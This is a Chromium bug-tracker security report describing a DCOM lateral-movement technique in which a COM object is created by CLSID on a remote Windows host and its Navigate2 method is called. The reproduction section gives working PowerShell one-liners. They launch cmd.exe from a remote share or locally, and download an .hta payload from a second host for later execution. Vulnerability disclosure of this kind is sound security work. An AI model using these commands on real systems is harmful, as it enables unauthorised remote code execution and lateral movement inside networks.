Issue metadata
Security: Chrome Navigate2 CLSID Lateral Vector
Reported by thruc...@gmail.com, Jul 25
Issue description

VULNERABILITY DETAILS
If an attacker has the necessary credentials, it is possible to cause the browser (CHROME, if the default is CHROME) on a remote machine to visit a site of the attacker's choice, or run a local executable (or run a UNC path exe, however a consent window needs to be agreed to). This may get a 'functions as designed' response, or 'that is a Windows issue'. Likely both. Anyway. It's another way to rick roll, if nothing else.

VERSION
Google Chrome 67.0.3396.99 (Official Build) (64-bit) (cohort: Stable)
Revision a337fbf3c2ab8ebc6b64b0bfdce73a20e2e2252b-refs/branch-heads/3396@{#790}

[System.Environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      16299  0

REPRODUCTION CASE
*Valid credentials on the (remote) host are necessary.*

~run a remotely sourced binary (\\aremoteshare\cmd.exe) on a remote host (10.0.0.1). A popup must be clicked through. Works best with an IP, and not a hostname.

[System.Activator]::CreateInstance([Type]::GetTypeFromCLSID("{c08afd90-f2a1-11d1-8455-00a0c91f3880}","10.0.0.1")).Navigate2("\\10.0.0.2\Users\share\cmd.exe")

If the exe is local, this is not necessary.

[System.Activator]::CreateInstance([Type]::GetTypeFromCLSID("{c08afd90-f2a1-11d1-8455-00a0c91f3880}","10.0.0.1")).Navigate2("c:\windows\system32\cmd.exe")

If a 'handled' file extension is specified (for example .hta) the file is automatically saved locally. It can then be run with a follow-up command. This however still requires the user to click through.

PS C:\Users\ph> [System.Activator]::CreateInstance([Type]::GetTypeFromCLSID("{c08afd90-f2a1-11d1-8455-00a0c91f3880}","10.0.0.1")).Navigate2("http://10.0.0.2:8000/msgbox.hta")
PS C:\Users\ph> [System.Activator]::CreateInstance([Type]::GetTypeFromCLSID("{c08afd90-f2a1-11d1-8455-00a0c91f3880}","10.0.0.1")).Navigate2("c:\users\x\Downloads\msgbox.hta")

And of course, you can send them to browse anywhere; ~Rickroll your friends :)

[System.Activator]::CreateInstance([Type]::GetTypeFromCLSID("{c08afd90-f2a1-11d1-8455-00a0c91f3880}","10.0.0.1")).Navigate2("https://www.youtube.com/watch?v=dQw4w9WgXcQ")

THE FACT THIS REQUIRES CREDS MAY UNDERMINE EVERYTHING. However it does feel slightly like the whole CLSID Excel||onenote.Application.DDEinitiate thing; hxxps[:]//enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
Nov 1
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by mbarbe...@chromium.org, Jul 25